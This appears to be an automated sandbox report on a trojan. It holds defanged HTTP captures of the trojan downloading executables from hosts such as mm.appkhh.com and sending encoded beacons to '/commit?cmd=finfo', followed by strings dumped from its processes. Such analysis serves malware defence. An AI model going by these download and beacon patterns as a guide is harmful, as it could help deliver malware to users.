Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
html,body {.. overflow-x: hidden;..}..body {.. background: #ebebeb;.. position: relative;...font-family: "Helvetica Neue","Microsoft YaHei","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{.. color: #333;..}..a:hover,a:focus {.. color: #f60;.. text-decoration: none;..}..a:focus {.. outline: thin dotted;.. outline: 5px auto -webkit-focus-ring-color;.. outline-offset: -2px;..}../*bootstrap fieldset*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap nav*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...navbar-inverse .navbar-nav>li>a{.. color: #fff;..}...navbar-inverse .navbar-nav>li>a:hover{.. color: #999;..}...navbar-inverse .navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>a:focus,...navbar-inverse .navbar-nav>.active>a:hover{.. color: #ddd;.. background-color:#080808;..}...navbar-collapse{...font-size: 1.1em;..}../*bootstrap page*/...pagination > li > a,...pagination > li > span {.. position: relative;.. float: left;.. padding: 6px 12px;.. margin: 0px 5px;.. line-height: 1.45;.. color: #222;.. text-decoration: none;.. background-color: #fff;.. border: 1px solid #ddd;..}...pagination > li.disabled > a{.. font-weight: bold;...}...pagination > li > a:hover,...pagination > li > span:hover,...pagination > li > a:focus,...pagination > li > span:focus {.. color: #2cab93;.. background-color: #eee;..
<<< skipped >>>
GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*task inc*/..h4,h4 a{.. color: #F60;..}..h4 a:hover{.. color: #333;..}../*channel/list/tag*/...dc-item li{.. margin-bottom: 20px;.. overflow: hidden;..}...dc-item p{ .. line-height: 2.0;..}...dc-item p.lead{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.lead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...margin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}...dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.dc-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;.. margin-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidden;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-size:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margin:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{...font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal;..}...dc-task-pad{...padding:40px 0;..}...dc-content{.. margin-bottom: 15px;...font-size: 1.2em;.. line-height: 1.8em;...color: #555;...overflow: hidden;..}...dc-content a{.. color: #f60;..}...dc-content a:hover{.. color: #333;..}...dc-content .nav-tabs{.. margin-top:15px;..}...dc-content .tab-content{.. padding-top: 15px;..}...dc-content .apply{.. padding:20px 0;.. text-align: center;..}...dc-content .dc-image{...margin:0 auto;..}...dc-content table td{.. padding-left: 10px;..}...dc-content pre {...border-radius: 0;.. margin: 1.64em 0;..
<<< skipped >>>
GET /Public/html5shiv/3.7.2/html5shiv.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:51 GMT
Content-Type: application/javascript
Content-Length: 2639
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-a4f"
Expires: Sat, 07 Nov 2015 16:59:51 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
<<< skipped >>>
GET /Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:52 GMT
Content-Type: application/vnd.ms-fontobject
Content-Length: 20127
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
ETag: "557f7832-4e9f"
Accept-Ranges: bytes
<<< skipped >>>
GET /Public/images/sns_qq.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: image/png
Content-Length: 1851
Last-Modified: Tue, 19 May 2015 04:17:19 GMT
Connection: keep-alive
ETag: "555ab94f-73b"
Expires: Mon, 07 Dec 2015 04:59:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
<<< skipped >>>
GET /Public/jquery/1.11.3/jquery.min.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: application/javascript
Content-Length: 95992
Last-Modified: Wed, 19 Aug 2015 17:28:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "55d4bcc9-176f8"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
<<< skipped >>>
GET /View/Home/Task//base.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: application/javascript
Content-Length: 17513
Last-Modified: Mon, 19 Oct 2015 06:32:55 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56248e97-4469"
Expires: Sat, 07 Nov 2015 16:59:59 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/* @name daicuo.cc base.js..** @lasttime 2015-10-19..** @email 271513820@qq.com..** dc.scroll.page() .............................** dc.scroll.fixed($id,$top,$width) ..............** dc.scroll.totop($id,$top) ........................ ...CSS.......$id..** dc.click.nextpage(); ............(.........)..** dc.click.share(); .dc-share....................** dc.click.collect(); .dc-collect....................** dc.click.down(); .dc-down....................** dc.click.up(); .dc-up....................** dc.click.hits(); .dc-tj..........................** dc.key.down(); ..............** dc.user.islogin() .................. .dc-islogin..** dc.user.login() .................** dc.user.score() ........................ dc-user-score..** dc.task.bind() ............ #dc-task..** dc.load.cms(); ajax..............** dc.load.images(); ....................** dc.load.union($second); ..............** dc.load.hits($id); ....................** dc.cookie.set(name, value, days)..** dc.cookie.get(name)..** dc.cookie.del(name)..*/..dc.scroll = {...'page' : function(){....// ............... $(this).unbind("scroll");....$(window).bind('scroll', function(){.....var nexturl = $("#dc-nextpage").attr('data-href');.....if(nexturl == undefined){......return false;.....}.....var c = $(window).height();.....var t = $(document).scrollTop(); .....var h = $(document).height();.....if( h - t - c == 0 ){......$.get(nexturl (dc.page*1 1), function(data){.......if(data){........// .......................$("#dc-item").append(data);........// ..............
<<< skipped >>>
GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "7c8bb8b999f19239c68f0bca1cf9491c:1446844256"
Last-Modified: Fri, 06 Nov 2015 21:10:56 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00067820760341062666110713
Server: Apache
tracecode: 00067820760341062666110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC3B14288B214300D1:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Host: 103.7.29.215
HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=600, s-maxage=60
Expires: Sat, 07 Nov 2015 05:10:16 GMT
Last-Modified: Fri, 08 May 2015 02:43:07 GMT
Content-Type: application/octet-stream
Content-Length: 47240016
X-Cache-Lookup: Hit From Disktank
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991270750315632138110712
Server: Apache
tracecode: 35991270750315632138110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B9146A82791018378:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /mmliao/MM-liao8863.exe HTTP/1.1
Host: mm.appkhh.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sat, 07 Nov 2015 05:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe
Set-Cookie: ASP.NET_SessionId=unvtmf55i2o5pj550p3epgra; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 808
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe">here</a>.</h2>..</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="../download/SubConfig.aspx?id1=8863" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="9F81D7CC" />..</div>.. <div>.. .. </div>.. </form>..</body>..</html>....
GET /v1/t/full/p/mini/tn/10003408/ch_dl_url.exe HTTP/1.1
Host: j.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.1
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.22
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe
0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033015391911494410110713
Server: Apache
tracecode: 00033015391911494410110713
Set-Cookie: BAIDUID=37CF03EF72C69E44C1FECBC156BA5EE4:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h
....<)..8....m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o...p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00128049050818948618110713
Server: Apache
tracecode: 00128049050818948618110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0813C71ECDC5124A9:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00072362801213477898110713
Server: Apache
tracecode: 00072362801213477898110713
Set-Cookie: BAIDUID=A9AAE706CAC814E2200D085686071519:FG=1; expires=Sun, 06-Nov-16 05:00:07 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h
....<)..8....m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o...p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00119517720658453514110713
Server: Apache
tracecode: 00119517720658453514110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA05794EB27122BF6134F:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
.#4H........................................!#$%&"k." ,-.
3234!~:9:;.i.=@ABK..DGHIBKLMOOPQ.STU_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m.............&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."..4t..S...0.@E..Jpz...-...H.;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00145449851213477898110713
Server: Apache
tracecode: 00145449851213477898110713
Set-Cookie: BAIDUID=E927C7BA6E0D653E6B7119B2F952D9BD:FG=1; expires=Sun, 06-Nov-16 05:00:14 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
.#4H........................................!#$%&"k." ,-.
3234!~:9:;.i.=@ABK..DGHIBKLMOOPQ.STU_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m.............&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."..4t..S...0.@E..Jpz...-...H.;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00129075050581376522110713
Server: Apache
tracecode: 00129075050581376522110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0FC4D9B271683B1BE:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00017557620315632138110713
Server: Apache
tracecode: 00017557620315632138110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3324C44730134BB38:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
xianfeng.exe_272:
.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
pG.lH
d&.iH
(1v%f M*
.na;T
%SCCg
HJ.Wr
Nullsoft Install System v2.46-Unicode
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|/":
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
OCALS~1\Temp\nsf4.tmp\System.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\ioSpecial.ini
ttp://VVV.xfplay.com
8.9.0 P2P
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp
nsf4.tmp
\Temp\nsf4.tmp\ioSpecial.ini
8-246WCGQ598DE}) i .r1 ?e
.2900.5512
m\LOCALS~1\Temp\nsf4.tmp
nfeng.exe
6.0.2900.5512
xianfeng.exe
"%Program Files%\xfplay\xianfeng.exe"
%Program Files%\xfplay
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\xfplay\xianfeng.exe
554304191
1.1.2.1
9.0.1 P2P
iexplore.exe_1676:
%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.fg>
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
BaiduP2PService.exe_472:
.text
`.rdata
@.data
.rsrc
t%SSSPj
SWSShX
D$%SP
tGHt.Ht&
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
.mixcrt
KERNEL32.DLL
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
kernel32.dll
127.0.0.1
do exit check, update available=%d
xbdyy is running, %d connections
ProcessRequest spend too much time to finish, Cmd=%d, time = %d ms
tcp peer closed
tcp connection error
API Call: Type = -
StartTask: h = 0x%p, r=%d
StopTaskAsync: h = 0x%p, r=%d
StopTaskSync: h = 0x%p, r=%d
FreeTaskHandle: h = 0x%p, r=%d
BatchOperation: h = 0x%p, r=%d
GetTask List,nRet=%d
CreateTask: h = 0x%p,r=%d
DelTempFile: %s\%s
DelResumeInfo: %s\%s
GetTaskInfo: h = 0x%p, Ret=%d, StatCode=%d, nDownload=%d
set playing task, handle = %u
set playing bitrate = %u
set download queue length = %u
set autoupdate on = %u
set lang id = %u
read length %d, bad boy, closed
read length %d, bad boy, closed
Read nOff=I64i,nLength=d,nRet=%d
Read nOff=I64i,nLength=d,nRet=%d
GET /config/status.html
GET /config/status.html
HTTP/1.1 200 OK
HTTP/1.1 200 OK
1.3.6.1.4.1.311.2.1.12
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
1.2.840.113549.1.9.6
[d-d-d d:d:d.d]
[d-d-d d:d:d.d]
%%x
%%x
Resume Finish [%d]
Resume Finish [%d]
pending request at pid=%I64i timeout %d, clear
pending request at pid=%I64i timeout %d, clear
pending request at pid=%I64i,uids=%I64i,%I64i, timeout=%d, cancel, elapse=%d,duplicate alloc %d
pending request at pid=%I64i,uids=%I64i,%I64i, timeout=%d, cancel, elapse=%d,duplicate alloc %d
no retransmit 3,%d%%, tPending=%d
no retransmit 3,%d%%, tPending=%d
leave emergency, nSpeedTotal=%d, peer speed=%d, rank=%d
leave emergency, nSpeedTotal=%d, peer speed=%d, rank=%d
alloc no piece to %I64i, %d pending, %d partial, %d tail partial, blockset=%d
alloc no piece to %I64i, %d pending, %d partial, %d tail partial, blockset=%d
block done, remove reserve state : peer id=%I64i, blockid=%d
block done, remove reserve state : peer id=%I64i, blockid=%d
%I64i have %d
%I64i have %d
Acc got qid=%s, domain=%s
Acc got qid=%s, domain=%s
Acc got no qid, ret=%d, deny acc
Acc got no qid, ret=%d, deny acc
XXXXXXXX
XXXXXXXX
Acc got host=%u.%u.%u.%u:%u
Acc got host=%u.%u.%u.%u:%u
XXX
XXX
GET %s HTTP/1.1
GET %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: %u.%u.%u.%u:%u
Host: %u.%u.%u.%u:%u
Key: %s
Key: %s
%snOffset=%I64i,%d
%snOffset=%I64i,%d
%d.%d.%d.%d
%d.%d.%d.%d
Task ID = u
Task ID = u
Peers Passive = i
Peers Passive = i
Time Get Login = i ms
Time Get Login = i ms
Time Login = i ms
Time Login = i ms
Lan IP = %s
Lan IP = %s
Wan IP = %s
Wan IP = %s
%s : attention, read file buf the filesize is %I64i, nToRead=%I64i,index=%u
%s : attention, read file buf the filesize is %I64i, nToRead=%I64i,index=%u
%s : attention, it should not be here,read at %I64u(%I64u), no data, return
%s : attention, it should not be here,read at %I64u(%I64u), no data, return
%s : read at %I64u(%I64u), no data, return, index=%u, %I64i
%s : read at %I64u(%I64u), no data, return, index=%u, %I64i
%s : -------------------------------------------------- first buffering time=%d, DLed=%I64i
